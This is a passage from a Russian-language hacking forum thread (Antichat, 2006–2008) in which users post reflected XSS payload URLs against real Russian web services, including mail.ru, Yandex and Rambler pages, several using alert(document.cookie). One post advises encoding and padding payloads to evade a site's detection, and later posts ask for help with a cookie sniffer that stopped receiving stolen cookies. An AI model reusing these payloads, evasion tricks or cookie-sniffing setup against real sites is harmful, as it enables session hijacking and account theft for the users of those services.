ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 12.12.2006, 22:41
Аватар для abashkin
abashkin
Banned
Регистрация: 09.07.2006
Сообщений: 3
Провел на форуме:
17495

Репутация: -18
По умолчанию

Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...
 
Ответить с цитированием

  #62  
Старый 13.12.2006, 00:13
Аватар для m17
m17
Новичок
Регистрация: 05.12.2006
Сообщений: 22
Провел на форуме:
32556

Репутация: 6
По умолчанию

Цитата:
Сообщение от abashkin  
Я думаю нужно как то обходить этого стукача-отлавливателя.....иначе неодна xss непродержится долгл..даже если одни запрос или отчёт пришёл что на такой то такой то странице был замечен <script></script> то всё уже...
ни в коем случае не отправлять открытым текстом, закодировать ессесена, табуляций навтыкать, проблема только в том что написание скрипта который избавиться от всего этого мусора не составляет труда, и поэтому если уж они таким образом что-то отлавливают, то должно быть это сделано положенным образом...
 
Ответить с цитированием

  #63  
Старый 13.12.2006, 22:43
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Постараюсь как можно короче!....
Кто знает тот поймёт!

http://top.mail.ru/stat/index.php?url="><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #64  
Старый 14.12.2006, 15:47
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

XSS на Яндексе, можеет кому-нибудь пригодиться...:

Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3Cscript%3Ealert()%3C/script%3E

И еше на Рамблере:
Код:
http://vision.rambler.ru/actions/piece.html?album=1%22%3E%3Cscript%3Ealert()%3C/script%3E
 
Ответить с цитированием

  #65  
Старый 14.12.2006, 19:02
Аватар для slider
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

Ток что нашол http://foto.rambler.ru/topics/7316410/date/?p=15"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #66  
Старый 10.07.2007, 10:01
Аватар для 4nob1oz
4nob1oz
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752

Репутация: 72
По умолчанию

http://icq.rambler.ru/srch?words=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
 
Ответить с цитированием

  #67  
Старый 05.12.2008, 13:20
Аватар для Campers
Campers
Новичок
Регистрация: 25.11.2008
Сообщений: 3
Провел на форуме:
7881

Репутация: 0
По умолчанию

у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??
 
Ответить с цитированием

  #68  
Старый 05.12.2008, 13:39
Аватар для Nelzone
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
Провел на форуме:
4700216

Репутация: 261
По умолчанию

Цитата:
Сообщение от Campers  
у меня беда. все сделал правильно. тестировал работает или нет, все нормально пришло на снифер http://na-s.ru и все после этого уже больше не сливало нечего на снифер, пишет база пуста и все, как исправить?? мб из-за браузера??
смари как ево обычный куки стойт и через него смари!
 
Ответить с цитированием

  #69  
Старый 05.12.2008, 15:15
Аватар для Campers
Campers
Новичок
Регистрация: 25.11.2008
Сообщений: 3
Провел на форуме:
7881

Репутация: 0
По умолчанию

НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю
 
Ответить с цитированием

  #70  
Старый 05.12.2008, 16:02
Аватар для P3L3NG
P3L3NG
Banned
Регистрация: 04.06.2008
Сообщений: 402
Провел на форуме:
2267346

Репутация: 719
По умолчанию

Цитата:
Сообщение от Campers  
НЕ а почему первый раз получилось и все больше не проходит?? Залейте плз уже готовые файлы, которые надо добавлять на сайт. мб я чето не так делаю
пришло? 2 года уже прошло. оч сомневаюсь
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Реализация XSS на rambler.ru Майор E-Mail 8 21.09.2006 20:50
Xss на mail.ru em00s7 E-Mail 14 08.06.2006 00:38
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ